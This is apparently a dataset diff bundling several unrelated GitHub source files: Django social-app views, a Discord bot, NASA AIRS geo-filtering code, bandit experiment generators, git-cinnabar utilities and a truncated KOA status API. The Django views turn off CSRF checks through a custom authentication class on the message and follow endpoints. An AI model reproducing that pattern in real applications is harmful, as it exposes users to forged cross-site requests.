diff --git "a/1470.jsonl" "b/1470.jsonl" new file mode 100644--- /dev/null +++ "b/1470.jsonl" @@ -0,0 +1,1865 @@ +{"seq_id":"30230568471","text":"# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append('../../helper/python.helper')\nsys.path.append('../../helper/tiup.helper')\n\nfrom ticat import Env\nfrom strs import to_true\nfrom topology import TiUPYaml\n\ndef main():\n\tenv = Env()\n\tdepose_kvs = to_true(env.must_get('deploy.env.kvs.depose-after-deployed'))\n\n\tyaml = TiUPYaml(env, depose_kvs = depose_kvs)\n\ttext, path = yaml.save()\n\n\tenv.set('tidb.tiup.yaml', path)\n\tenv.flush()\n\n\tprint(text + '\\n')\n\tprint('tidb.tiup.yaml=' + path)\n\nmain()\n","repo_name":"ticat-mods/tidb.cluster","sub_path":"deploy/gen/tiup-yaml.py","file_name":"tiup-yaml.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"12243294230","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth import login\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import reverse\nfrom django.db.models import Q\nfrom django.utils import timezone\nfrom django.template.loader import render_to_string\nfrom django.http import JsonResponse\n\nfrom .forms import CustomUserCreationForm, CustomUserChangeForm\nfrom .models import User, Message, Follow, Twoot\nfrom .serializers import UserModelSerializer, MessageModelSerializer, FollowModelSerializer\n\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ModelViewSet\nfrom rest_framework.authentication import SessionAuthentication\n\n\n# Create your views here.\ndef profile(request, username):\n try:\n user = User.objects.get(username=username);\n except:\n # in reality raise 404\n return render(request, 'twotter/dashboard.html')\n\n editPerms = False\n if request.user.is_authenticated and request.user == user:\n editPerms = True\n\n context = locals()\n return render(request, 'twotter/profile.html', context)\n\n\ndef dashboard(request):\n return render(request, 'twotter/dashboard.html')\n\n\n@login_required\ndef edit_profile(request, username):\n user = request.user\n form = CustomUserChangeForm(request.POST or None,\n initial={'first_name': user.first_name, 'last_name': user.last_name,\n 'email': user.email, 'status': user.status\n , 'user_img': user.user_img})\n if request.method == \"POST\":\n form = CustomUserChangeForm(request.POST, request.FILES)\n if form.is_valid():\n user.first_name = request.POST['first_name']\n user.last_name = request.POST['last_name']\n user.email = request.POST['email']\n user.status = request.POST['status']\n print(request.FILES)\n user.user_img = request.FILES['user_img']\n user.save()\n return redirect(reverse(\"profile\", args=[username]))\n return render(request, \"twotter/edit_profile.html\", {\"form\": form})\n\n\ndef signup(request):\n form = CustomUserCreationForm(request.POST or None, request.FILES)\n if request.method == \"POST\":\n if form.is_valid():\n user = form.save()\n login(request, user)\n return redirect(reverse(\"dashboard\"))\n\n return render(request, \"twotter/signup.html\", {\"form\": form})\n\n\ndef userlist(request):\n return render(request, \"twotter/userlist.html\")\n\n\ndef chat(request):\n return render(request, \"twotter/chat.html\")\n\n\n# API\nclass UserModelViewSet(ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserModelSerializer\n allowed_methods = ('GET', 'HEAD', 'OPTIONS')\n pagination_class = None\n\n def list(self, request, *args, **kwargs):\n self.queryset = self.queryset.exclude(username=request.user.username)\n target = self.request.query_params.get('target', None)\n if target is not None:\n self.queryset = self.queryset.filter(Q(username=target))\n serialized = UserModelSerializer(self.queryset, many=True)\n return Response(serialized.data)\n\n\nclass MessagePagination(PageNumberPagination):\n page_size = 20\n\n\nclass CsrfExemptAuthentication(SessionAuthentication):\n def enforce_csrf(self, request):\n return\n\n\nclass MessageModelViewSet(ModelViewSet):\n queryset = Message.objects.all()\n serializer_class = MessageModelSerializer\n allowed_methods = ('GET', 'POST', 'HEAD', 'OPTIONS')\n authentication_classes = (CsrfExemptAuthentication,)\n pagination_class = MessagePagination\n\n def list(self, request, *args, **kwargs):\n self.queryset = self.queryset.filter(Q(receiver=request.user) | Q(sender=request.user))\n target = self.request.query_params.get('target', None)\n if target is not None:\n self.queryset = self.queryset.filter(Q(receiver=request.user, sender__username=target) |\n Q(receiver__username=target, sender=request.user))\n serialized = MessageModelSerializer(self.queryset, many=True)\n return Response(serialized.data)\n\n def retrieve(self, request, *args, **kwargs):\n msg = get_object_or_404(\n self.queryset.filter(Q(receiver=request.user) | Q(sender=request.user), Q(pk=kwargs['pk']))\n )\n serialized = MessageModelSerializer(msg)\n return Response(serialized.data)\n\n\nclass FollowModelViewSet(ModelViewSet):\n queryset = Follow.objects.all()\n serializer_class = FollowModelSerializer\n allowed_methods = ('GET', 'POST', 'DELETE', 'HEAD', 'OPTIONS')\n authentication_classes = (CsrfExemptAuthentication,)\n pagination_class = MessagePagination\n\n def list(self, request, *args, **kwargs):\n target = self.request.query_params.get('target', None)\n req = self.request.query_params.get('req', None)\n if req is None:\n self.queryset = self.queryset.filter(Q(follower=request.user, subject__username=target))\n elif req == \"followers\":\n self.queryset = self.queryset.filter(Q(subject__username=target))\n elif req == \"following\":\n self.queryset = self.queryset.filter(Q(follower__username=target))\n\n serialized = FollowModelSerializer(self.queryset, many=True)\n return Response(serialized.data)\n\n\ndef twoot_list(request):\n twoots = Twoot.objects.filter(published_date__lte=timezone.now()).order_by('published_date')\n return render(request, 'twoot/twoot_list.html', {'twoots': twoots})\n\n\ndef twoot_detail(request, pk):\n twoot = get_object_or_404(Twoot, pk=pk)\n is_liked = False\n if twoot.likes.filter(id=request.user.id).exists():\n is_liked = True\n return render(request, 'twoot/twoot_detail.html', {'twoot': twoot, 'is_liked': is_liked, 'total_likes': twoot.total_likes(), })\n\n\ndef like_twoot(request):\n twoot = get_object_or_404(Twoot, id=request.POST.get('id'))\n is_liked = False\n if twoot.likes.filter(id=request.user.id).exists():\n twoot.likes.remove(request.user)\n is_liked = False\n else:\n twoot.likes.add(request.user)\n is_liked = True\n context = {\n 'twoot': twoot,\n 'is_liked': is_liked,\n 'total_likes': twoot.total_likes(),\n }\n if request.is_ajax():\n html = render_to_string('twoot/likes.html', context, request=request)\n return JsonResponse({'form': html})","repo_name":"RZhang05/Twotter","sub_path":"twotter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29225533228","text":"import math\nimport os\nfrom datetime import datetime\n\nimport pandas\n\nBASE_URL = 'https://airsl2.gesdisc.eosdis.nasa.gov/data/Aqua_AIRS_Level2/AIRS2CCF.006/'\n\n\ndef normalize_latitude_arithmetic(latitude):\n if latitude < -90:\n return -90\n if latitude > 90:\n return 90\n\n return latitude\n\n\ndef normalize_longitude_arithmetic(longitude):\n if longitude < -180:\n return longitude % 180\n if longitude > 180:\n return -180 + (longitude % 180)\n\n return longitude\n\n\ndef includes_intl_date_line(min_lon, max_lon, include_prime_meridian) -> bool:\n if min_lon == -180 or max_lon == 180:\n return True\n lon_naively_contains_zero = (min_lon <= 0 <= max_lon)\n if ((lon_naively_contains_zero and include_prime_meridian) or\n (not lon_naively_contains_zero and not include_prime_meridian)):\n return False\n else:\n return True\n\n\ndef calculate_longitude_angle_in_degrees(min_lon, max_lon, include_prime_meridian) -> int:\n if min_lon > max_lon:\n # Swap min and max to simplify math\n _min_lon, max_lon = max_lon, min_lon\n\n if (min_lon <= 0 <= max_lon) and include_prime_meridian:\n return abs(min_lon) + max_lon\n\n antimeridian = includes_intl_date_line(min_lon, max_lon, include_prime_meridian)\n\n if antimeridian and (min_lon <= 0 <= max_lon) or include_prime_meridian:\n # Special meridian logic\n return (180 - max_lon) + abs(-180 - min_lon)\n else:\n # Regular meridian logic\n return abs(max_lon - min_lon)\n\n\ndef expand_longitude_slice_by_degrees(min_lon, max_lon, include_prime_meridian, degrees) \\\n -> (int, int, bool, int):\n \"\"\"\n Returns a tuple of expanded min and max longitude, whether the expanded area includes the prime meridian, and\n the final span of the expanded angle in degrees.\n \"\"\"\n if min_lon > max_lon:\n # Swap min and max to simplify math\n min_lon, max_lon = max_lon, min_lon\n original_span = calculate_longitude_angle_in_degrees(min_lon, max_lon, include_prime_meridian)\n\n # Handle trivial case where expanded angle is the whole globe\n if original_span + (degrees * 2) >= 360:\n return -180, 180, True, 360\n\n expanded_min_lon = normalize_longitude_arithmetic(min_lon - degrees)\n expanded_max_lon = normalize_longitude_arithmetic(max_lon + degrees)\n\n if expanded_min_lon > expanded_max_lon:\n # Swap min and max to simplify math\n expanded_min_lon, expanded_max_lon = expanded_max_lon, expanded_min_lon\n\n if not include_prime_meridian:\n # Does this expanded area now include the prime meridian?\n if 0 < min_lon <= degrees:\n include_prime_meridian = True\n elif max_lon < 0 and (degrees + max_lon >= 0):\n include_prime_meridian = True\n\n expanded_span = calculate_longitude_angle_in_degrees(expanded_min_lon, expanded_max_lon,\n include_prime_meridian)\n # Round to 0.001 for sake of this check\n original_span = round(original_span, 3)\n\n if not (expanded_span >= original_span):\n raise ValueError('Expanded span is smaller than original span. {} < {}'.format(expanded_span,\n original_span))\n expected_span = original_span + (degrees * 2)\n\n # Round to 0.001 for sake of this check\n expected_span = round(expected_span, 3)\n\n if expected_span > 360:\n expected_span = 360\n\n error_amount = abs(expected_span - expanded_span)\n\n if error_amount >= 0.002 and expanded_span < 360:\n raise ValueError(\n 'Expanded span is smaller than expected. Original {}, expanded to {}, expected {} (expansion angle {})'\n .format(original_span, expanded_span, expected_span, degrees))\n\n return expanded_min_lon, expanded_max_lon, include_prime_meridian, expanded_span\n\n\ndef calculate_lat_lon_filter_condition(data, min_lat, max_lat, min_lon, max_lon, include_prime_meridian,\n is_search_area):\n\n # Handle special logic for expanded search area\n if is_search_area:\n search_min_lat = normalize_latitude_arithmetic(min_lat - 10)\n search_max_lat = normalize_latitude_arithmetic(max_lat + 10)\n latitude_condition = (data.lat >= search_min_lat) & (data.lat <= search_max_lat)\n else:\n latitude_condition = (data.lat >= min_lat) & (data.lat <= max_lat)\n\n # include longitudes within the specified range considering whether or not the prime meridian is included\n lon_naively_contains_zero = (min_lon <= 0 <= max_lon)\n special_logic = not ((lon_naively_contains_zero and include_prime_meridian) or\n (not lon_naively_contains_zero and not include_prime_meridian))\n if special_logic:\n longitude_condition = (data.lon <= min_lon) | (data.lon >= max_lon)\n else:\n longitude_condition = (data.lon >= min_lon) & (data.lon <= max_lon)\n\n # Expand search area longitude further near the poles\n if is_search_area:\n # 1st tier, +/- 10 degrees at absolute latitude < 60\n expanded_min_lon, expanded_max_lon, includes_prime, span = \\\n expand_longitude_slice_by_degrees(min_lon, max_lon, include_prime_meridian, 10)\n lon_naively_contains_zero = (expanded_min_lon <= 0 <= expanded_max_lon)\n special_logic = not ((lon_naively_contains_zero and includes_prime) or\n (not lon_naively_contains_zero and not includes_prime))\n if special_logic:\n longitude_condition |= (\n ((data.lon <= expanded_min_lon)\n |\n (data.lon >= expanded_max_lon))\n &\n ((data.lat > -60) & (data.lat < 60))\n )\n else:\n longitude_condition |= (\n ((data.lon >= expanded_min_lon)\n &\n (data.lon <= expanded_max_lon))\n &\n ((data.lat > -60) & (data.lat < 60))\n )\n # 2nd tier, +/- 25 degrees at 60-70 absolute latitude\n expanded_min_lon, expanded_max_lon, includes_prime, span = \\\n expand_longitude_slice_by_degrees(min_lon, max_lon, include_prime_meridian, 25)\n lon_naively_contains_zero = (expanded_min_lon <= 0 <= expanded_max_lon)\n special_logic = not ((lon_naively_contains_zero and includes_prime) or\n (not lon_naively_contains_zero and not includes_prime))\n if special_logic:\n longitude_condition |= (\n ((data.lon <= expanded_min_lon)\n |\n (data.lon >= expanded_max_lon))\n &\n ((data.lat <= -60) | (data.lat >= 60))\n )\n else:\n longitude_condition |= (\n ((data.lon >= expanded_min_lon)\n &\n (data.lon <= expanded_max_lon))\n &\n ((data.lat <= -60) | (data.lat >= 60))\n )\n # 3rd tier, +/- 45 degrees at 70-80 absolute latitude\n expanded_min_lon, expanded_max_lon, includes_prime, span = \\\n expand_longitude_slice_by_degrees(min_lon, max_lon, include_prime_meridian, 45)\n lon_naively_contains_zero = (expanded_min_lon <= 0 <= expanded_max_lon)\n special_logic = not ((lon_naively_contains_zero and includes_prime) or\n (not lon_naively_contains_zero and not includes_prime))\n if special_logic:\n longitude_condition |= (\n ((data.lon <= expanded_min_lon)\n |\n (data.lon >= expanded_max_lon))\n &\n ((data.lat <= -70) | (data.lat >= 70))\n )\n else:\n longitude_condition |= (\n ((data.lon >= expanded_min_lon)\n &\n (data.lon <= expanded_max_lon))\n &\n ((data.lat <= -70) | (data.lat >= 70))\n )\n # 4th tier, all longitudes at absolute latitude > 80\n longitude_condition |= (\n ((data.lat <= -80) | (data.lat >= 80))\n )\n\n geo_condition = latitude_condition & longitude_condition\n\n return geo_condition\n\n\nclass AquaPositions(object):\n\n def get_hdf_urls(self, start_granule, end_granule, min_latitude, min_longitude, max_latitude, max_longitude,\n include_prime_meridian, gca_threshold, gca_is_max, test_hdf_output):\n min_year, max_year = start_granule.year, end_granule.year\n base_dir = os.path.normpath(os.path.join(os.path.dirname(__file__), '..', 'data'))\n\n data_files = [\n os.path.join(base_dir, 'aqua_positions_%s.csv.zip' % year) for year in range(min_year, max_year + 1)\n ]\n\n data = pandas.concat(\n (pandas.read_csv(filename) for filename in data_files), sort=True\n )\n\n condition = calculate_lat_lon_filter_condition(data, min_latitude, max_latitude, min_longitude,\n max_longitude, include_prime_meridian,\n is_search_area=True)\n\n # granule times must be within the specified range - this can be calculated against the granule numbers\n if end_granule.granule_number >= start_granule.granule_number:\n condition &= (\n (data.granule >= start_granule.granule_number) & (data.granule <= end_granule.granule_number)\n )\n else:\n condition &= (\n ((data.granule >= start_granule.granule_number) | (data.granule <= end_granule.granule_number))\n )\n\n # check if granule was captured within min/max specified solar GCA\n if gca_is_max:\n condition &= (data.GCA <= gca_threshold)\n else:\n condition &= (data.GCA >= gca_threshold)\n\n # granule dates must be within the specified range\n data['date_value'] = data.year * 1000 + data.day # same value as in Granule\n condition &= ((data.date_value >= start_granule.date_value) & (data.date_value <= end_granule.date_value))\n\n data = data[condition]\n\n if test_hdf_output:\n return data\n\n return (self.get_url(filename) for filename in data.hdf_filename)\n\n @staticmethod\n def get_url(filename):\n # AIRS.2002.08.30.225.L2.CC.v6.0.7.0.G13201091521.hdf\n year, month, day, granule_number = map(int, filename.split('.')[1:5])\n\n day_of_year = datetime.strftime(datetime(year, month, day), '%j')\n # add leading zeros\n if len(day_of_year) == 2:\n day_of_year = '0' + day_of_year\n elif len(day_of_year) == 1:\n day_of_year = '00' + day_of_year\n return '%s/%s/%s/%s' % (BASE_URL, year, day_of_year, filename)\n","repo_name":"rentcp/Heatwave","sub_path":"classes/aqua_positions.py","file_name":"aqua_positions.py","file_ext":"py","file_size_in_byte":10871,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"43244987398","text":"import discord\nfrom discord.ext import commands\nfrom discord_slash import SlashCommand, SlashContext\nfrom discord_slash.utils.manage_commands import create_option\nimport logging\nimport requests as r\nfrom datetime import datetime, timezone, timedelta\nfrom json import loads\nfrom modules.teachers.teachers import Monika\nfrom modules.music.player import Player\nfrom modules.pipa.pipa import Hostinsky\nfrom modules.countdown import Countdown\nfrom modules.now_maturuje.now_maturuje import Displayer\nimport os\nfrom os.path import join, dirname\nfrom dotenv import load_dotenv\n\ndebug = False\n\nDELETE_TIME = 20.0\nADMIN = 470490558713036801\ntzone = timezone(timedelta(hours=-2))\n\nif debug:\n logging.basicConfig(level=logging.DEBUG)\nelse:\n logging.basicConfig(level=logging.INFO)\n\nbot = commands.Bot(command_prefix=\"-\", owner_id=ADMIN, intents=discord.Intents.all())\nslash = SlashCommand(bot, sync_commands=True)\n\ndotenv_path = join(dirname(__file__), '.env')\nload_dotenv(dotenv_path)\n\nTOKEN = os.environ.get(\"TOKEN\")\n\n\n@bot.command(name=\"nick\")\n@commands.guild_only()\nasync def change_nick(ctx: commands.Context, target: discord.Member, *, nick: str = None):\n \"\"\"změní nick zadanému hráčovi\"\"\"\n nick = nick.strip()\n if len(nick) > 32:\n await ctx.send(\"Přezdívka může mít maximálně 32 charakterů\", delete_after=DELETE_TIME)\n return\n before = target.display_name\n try:\n await target.edit(nick=nick, reason=\"Změnil {0.author.name} v kanálu {0.channel.name}\".format(ctx))\n except discord.Forbidden:\n await ctx.send(\"Nemám právo měnit tuto přezdívku\")\n else:\n await ctx.send(\"Změněno z '{0}' na '{1}' uživatelem `{2}`\".format(before, nick, ctx.author.name))\n return\n\n\n@bot.command(name=\"among\")\nasync def among_get_active(ctx: commands.Context):\n \"\"\"Vypíše počet aktivních Among Us hráčů na Steamu\"\"\"\n url = \"https://api.steampowered.com/ISteamUserStats/GetNumberOfCurrentPlayers/v1/?format=json&appid=945360\"\n info = r.get(url)\n if info.status_code != 200:\n await ctx.send(\"Chyba při získávání informací od Steamu\", delete_after=DELETE_TIME)\n return\n info = loads(info.text)\n stats = info[\"response\"]\n embed = discord.Embed(title=\"Among Us\", colour=discord.Colour.from_rgb(197, 17, 17), timestamp=datetime.now(tz=tzone))\n embed.set_thumbnail(url=\"https://cdn.akamai.steamstatic.com/steam/apps/945360/header.jpg?t=1619622456\")\n embed.description = \"{0} aktivních hráčů\".format(stats[\"player_count\"])\n await ctx.send(embed=embed)\n return\n\n\n@bot.command(name=\"ping\")\nasync def pong(ctx: commands.Context):\n await ctx.send(\"Pong \" + str(int(bot.latency * 1000)) + \"ms\")\n\n\n@bot.command(name=\"abcdefg\", hidden=True)\nasync def placeholder(ctx: commands.Context):\n await ctx.send(\"%placeholder%\")\n\n\n@bot.command(name=\"exit\", hidden=True)\n@commands.is_owner()\nasync def shutdown(ctx: commands.Context):\n await ctx.send(\"Jdu spát\")\n for guild in bot.guilds:\n if guild.voice_client:\n await guild.voice_client.disconnect()\n await bot.close()\n exit(0)\n\n\n@bot.command(name=\"source\", aliases=[\"src\"])\nasync def print_source(ctx: commands.Context):\n \"\"\"Odkaz na zdrojový kód bota\"\"\"\n await ctx.send(\"https://github.com/stepech/DCBot\")\n\n\n@bot.event\nasync def on_ready():\n logging.info(\"I'm ready! {0.name}\".format(bot.user))\n for guild in await bot.fetch_guilds().flatten():\n logging.info(\"Connected to {0}\".format(guild.name))\n\n admin: discord.User = await bot.fetch_user(bot.owner_id)\n logging.info(\"Owner is: {0}\".format(admin.name))\n logging.info(\"---------\")\n logging.info(\"°°Ready°°\")\n\n\n@bot.event\nasync def on_member_update(before: discord.Member, after: discord.Member):\n if bot.get_guild(498423239119208448).get_role(770453970165694545) not in before.roles:\n return\n role: discord.Role = bot.get_guild(498423239119208448).get_role(827625682833637389)\n try:\n if before.status == discord.Status.offline and after.status is not before.status:\n await after.add_roles(role, reason=\"Viditelný status\")\n elif before.status != after.status and after.status == discord.Status.offline:\n await after.remove_roles(role, reason=\"Je offline/neviditelný\")\n except discord.NotFound:\n pass\n\n\n@bot.event\nasync def on_command_error(ctx: commands.Context, exc: commands.CommandError):\n if isinstance(exc, commands.MemberNotFound):\n await ctx.send(\"Uživatel nebyl nalezen\")\n elif isinstance(exc, commands.MissingRequiredArgument):\n await ctx.send(\"Špatné formátování příkazu. Nedodány veškeré argumenty\")\n elif isinstance(exc, commands.CommandNotFound):\n pass\n elif isinstance(exc, commands.NoPrivateMessage):\n await ctx.send(\"Nelze použít v soukromém chatu\")\n elif isinstance(exc, commands.CheckFailure):\n pass\n else:\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n await ctx.send(\"<@\" + str(470490558713036801) + \">, chyba\")\n raise exc\n\n\n@slash.slash(name=\"ping\", description=\"Pong\")\nasync def _ping(ctx: SlashContext):\n await pong(ctx)\n\n\n@slash.slash(name=\"among\", description=\"Aktivní počet Among Us hráčů na Steamu\")\nasync def _among(ctx: SlashContext):\n await among_get_active(ctx)\n\n\n@slash.slash(name=\"nick\", description=\"Změní nick uživateli\",\n options=[create_option(name=\"user\",\n description=\"Cíl kterému měníš přezdívku\",\n option_type=6,\n required=True),\n create_option(name=\"nick\",\n description=\"nová přezdívka\",\n option_type=3,\n required=False)])\nasync def _nick(ctx: SlashContext, user, nick=None):\n await change_nick(ctx, target=user, nick=nick)\n\n\n@slash.slash(name=\"exit\", description=\"Vypne bota, může použít jen stepech\")\n@commands.is_owner()\nasync def _shutdown(ctx: SlashContext):\n await shutdown(ctx)\n\n\n@slash.slash(name=\"source\", description=\"Odkaz na zdrojový kód bota\")\nasync def _print_source(ctx: SlashContext):\n await print_source(ctx)\n\n\nbot.add_cog(Countdown(bot))\nbot.add_cog(Monika(bot))\n#bot.add_cog(Player(bot))\nbot.add_cog(Hostinsky(bot))\nbot.add_cog(Displayer(bot))\nbot.run(TOKEN)\n","repo_name":"vidmartin/DCBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":6438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32035666002","text":"#coding: utf-8\n\nimport numpy as np\nimport os\nimport pickle\nimport pandas as pd\nfrom params import seed_nb\nimport pickle\n\nfrom utils import argmax_m\n\ndef compute_gaps(mu_p, N):\n K, M = mu_p.shape\n S_star, mu_star = argmax_m(mu_p, N+1)\n S_star = [S_star[m][:-1] for m in range(M)]\n mu_m = [mu_star[m][-2] for m in range(M)]\n mu_m1 = [mu_star[m][-1] for m in range(M)]\n gaps = np.matrix(np.zeros((K,M)))\n for m in range(M):\n for k in range(K):\n if (k in S_star[m]):\n gaps[k,m] = mu_p[k,m]-mu_m1[m]\n else:\n gaps[k,m] = mu_m[m]-mu_p[k,m]\n return gaps, S_star\n\ndef create_save_instances(ninstances,data_params,name,folder=\"\"):\n data_type, K, M, N_ = [data_params[a] for a in [\"data_type\", \"K\",\"M\",\"N\"]]\n instances_fname = folder+name+\".pck\"\n if (not os.path.exists(instances_fname)):\n instances = {}\n for nid in range(ninstances):\n W, mu, S_star, gaps = eval(data_type+\"_instance\")(K,M,N_,data_params[\"delta_min\"],data_params[\"alpha\"])\n K, M = mu.shape\n instances.setdefault(nid, {'W': W, 'S_star': S_star, \"mu\": mu, \"gaps\": gaps})\n with open(instances_fname, \"wb\") as f:\n pickle.dump(instances, f)\n with open(instances_fname, \"rb\") as f:\n instances = pickle.load(f)\n alpha = data_params[\"alpha\"]\n if ((alpha >= 0) and (data_type in [\"personalizedsynthetic\"])):\n for nid,NI in enumerate(instances):\n mu = instances[NI][\"mu\"]\n M = mu.shape[1]\n W = alpha*np.matrix(np.eye(M))+((1-alpha)/M)*np.matrix(np.ones((M,M)))\n gaps, S_star = compute_gaps(mu.dot(W), N_)\n instances[NI] = {\"W\":W, \"S_star\": S_star, \"mu\": mu, \"gaps\": gaps}\n return instances\n\ndef personalizedsynthetic_instance(K,M,N,delta_min,alpha):\n ## Weight matrix\n if (M==1):\n W = np.matrix([[1.]])\n else:\n W = np.matrix(((1-alpha)/M)*np.ones((M,M))+alpha*np.eye(M))\n assert (np.isclose(np.sum(W,axis=0),1)).all()\n while True:\n mu = np.matrix(np.random.normal(0,1,(K,M))).reshape((K,M))\n mu /= np.linalg.norm(mu,None)\n gaps, S_star = compute_gaps(mu.dot(W), N)\n delta_min_ = np.min(gaps)\n if ((delta_min_>=delta_min) and (delta_min_>0)):\n break\n return W, mu, S_star, gaps\n\n#' @param K number of arms\n#' @param M number of agents\n#' @param delta_min minimum value of gap\n#' @param alpha personalization degree\n#' @return W, mu, k_star, gaps\ndef synthetic_instance(K,M,N,delta_min,alpha=None):\n ## Weight matrix\n if (M==1):\n W = np.matrix([[1.]])\n else:\n alpha_ = np.random.choice([i*0.1 for i in range(0, 11, 1)],M)\n W = np.matrix(np.ones((M,M)))\n for m in range(M):\n W[:,m] = (1-alpha_[m])/M*W[:,m]\n np.fill_diagonal(W,alpha_+(1-alpha_)/M)\n assert (np.isclose(np.sum(W,axis=0),1)).all()\n while True:\n mu = np.matrix(np.random.normal(0,1,(K,M))).reshape((K,M))\n mu /= np.linalg.norm(mu,None)\n mu_p = mu.dot(W)\n gaps, S_star = compute_gaps(mu_p, N)\n delta_min_ = np.min(gaps)\n if ((delta_min_>=delta_min) and (delta_min_>0)):\n break\n return W, mu, S_star, gaps\n","repo_name":"clreda/near-optimal-federated","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"25098389972","text":"from __future__ import absolute_import, print_function, unicode_literals\nimport argparse\nimport os\nimport sys\nfrom cinnabar.helper import helper_hash, tree_hash\nfrom cinnabar import VERSION\n\n\nclass CLI(object):\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(title='subcommands', dest='command')\n\n @staticmethod\n def argument(*args, **kwargs):\n def decorator(func):\n if not hasattr(func, 'cli_arguments'):\n func.cli_arguments = []\n func.cli_arguments.append((args, kwargs))\n return func\n return decorator\n\n @staticmethod\n def subcommand(func):\n subparser = CLI.subparsers.add_parser(func.__name__, help=func.__doc__)\n if hasattr(func, 'cli_arguments'):\n # Because argparse.REMAINDER can't be used as first argument\n # without making flags emit a \"unrecognized argument\" error,\n # treat that specially.\n if len(func.cli_arguments) == 1:\n args, kwargs = func.cli_arguments[0]\n if kwargs.get('nargs') == argparse.REMAINDER:\n func.cli_remainder = args[0]\n func.cli_arguments = ()\n for args, kwargs in reversed(func.cli_arguments):\n subparser.add_argument(*args, **kwargs)\n del func.cli_arguments\n subparser.set_defaults(callback=func)\n\n @staticmethod\n def prepare(argv):\n CLI.parser.add_argument('--version', action=Version)\n\n args, leftovers = CLI.parser.parse_known_args(argv)\n\n if not hasattr(args, 'callback'):\n CLI.parser.print_help()\n CLI.parser.exit()\n\n if hasattr(args.callback, 'cli_remainder'):\n args = argparse.Namespace(**{\n 'callback': args.callback,\n args.callback.cli_remainder: leftovers,\n })\n else:\n args = CLI.parser.parse_args(argv)\n return (args.callback, args)\n\n\ndef iter_modules_in_path(path):\n base = os.path.abspath(os.path.normcase(path)) + os.sep\n for name, module in sys.modules.items():\n if not hasattr(module, '__file__'):\n continue\n\n path = module.__file__\n if not path:\n continue\n\n if path.endswith('.pyc'):\n path = path[:-1]\n path = os.path.abspath(os.path.normcase(path))\n\n if path.startswith(base):\n yield os.path.relpath(path, base).encode('ascii')\n\n\nclass Version(argparse.Action):\n def __init__(self, option_strings, dest=argparse.SUPPRESS,\n default=argparse.SUPPRESS,\n help=\"show program's version number and exit\"):\n super(Version, self).__init__(\n option_strings=option_strings, dest=dest, default=default,\n nargs='?', choices=('cinnabar', 'module', 'helper'),\n help=help)\n\n @staticmethod\n def cinnabar_version():\n return VERSION\n\n @staticmethod\n def module_version():\n # Import the remote_helper module, that is not imported by\n # git-cinnabar\n import cinnabar.remote_helper\n # Import the bdiff module, that is only imported if mercurial is\n # not installed\n import cinnabar.bdiff\n cinnabar_path = os.path.dirname(cinnabar.__file__)\n v = tree_hash(iter_modules_in_path(cinnabar_path), cinnabar_path)\n return v.decode('ascii')\n\n @staticmethod\n def helper_version():\n from cinnabar.helper import GitHgHelper\n try:\n with GitHgHelper.query(b'revision') as out:\n version = out.read(40).decode('ascii')\n except Exception:\n version = 'unknown'\n\n sha1 = (helper_hash() or 'unknown').decode('ascii')\n return version, sha1\n\n def __call__(self, parser, namespace, values, option_string=None):\n if values == 'cinnabar' or not values:\n print(self.cinnabar_version())\n if values == 'module' or not values:\n sha1 = self.module_version()\n if not values:\n print('module-hash:', sha1)\n else:\n print(sha1)\n if values == 'helper' or not values:\n version, sha1 = self.helper_version()\n if version != sha1:\n sha1 = '%s/%s' % (version, sha1)\n if not values:\n print('helper-hash:', sha1)\n else:\n print(sha1)\n\n parser.exit()\n","repo_name":"sergeykish/git-cinnabar","sub_path":"cinnabar/cmd/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"73648238242","text":"import instrument\nimport nires\nimport hires\nimport deimos\nimport lris\nimport kcwi\nimport nirc2\nimport nirspec\nimport osiris\nimport esi\nimport mosfire\nimport weather\nimport json\nimport db_conn\n\nfrom flask import Flask, render_template, request, redirect, url_for, session\n\nimport logging\nlog = logging.getLogger('koaapi')\n\n\n# Create a dictionary of the instrument Constructors\nINSTRUMENTS = {\n 'deimos':deimos.Deimos,\n 'esi':esi.Esi,\n 'hires':hires.Hires,\n 'kcwi':kcwi.Kcwi,\n 'lris':lris.Lris,\n 'mosfire':mosfire.Mosfire,\n 'nirc2':nirc2.Nirc2,\n 'nires':nires.Nires,\n 'nirspec':nirspec.Nirspec,\n 'osiris':osiris.Osiris,\n 'weather':weather.Weather\n }\n\n\ndef tpx_status(dev=False):\n '''\n Method to update the transfer status of koa data\n\n Arguments for the update will be passed via GET or POST\n instr: the instrument that created the data\n @type instr: string\n date: the utdate the instrument took the data\n @type date: string\n statusType: the type of file transfered\n @type statusType: string\n status: the status of the ingestion from IPAC\n @type status: string\n '''\n # get the arguments passed as a get or post\n args = request.args\n instr = args['instr'].lower()\n date = args['date']\n statusType = args['statusType']\n status = args['status']\n statusMessage = args.get('statusMessage', 'NULL')\n response = ''\n # change dev here for testonly paramater\n try:\n if args['testonly'].lower() == 'true': dev=True\n except:\n pass\n\n # Create the instrument subclass object based on instr \n try:\n # Here we create our instrumentStatus object that will handle any differences between instruments\n # INSTRUMENTS is the dictionary of instrument constructors\n instrumentStatus = INSTRUMENTS[instr](instr, date, statusType, status, statusMessage, dev)\n except Exception as e:\n log.error('error creating the object: ' + str(e))\n response = {'APIStatus':'ERROR', 'Message':f\"error creating the object for '{instr}'\"}\n else:\n # execute the status function based on statusType\n # statusType 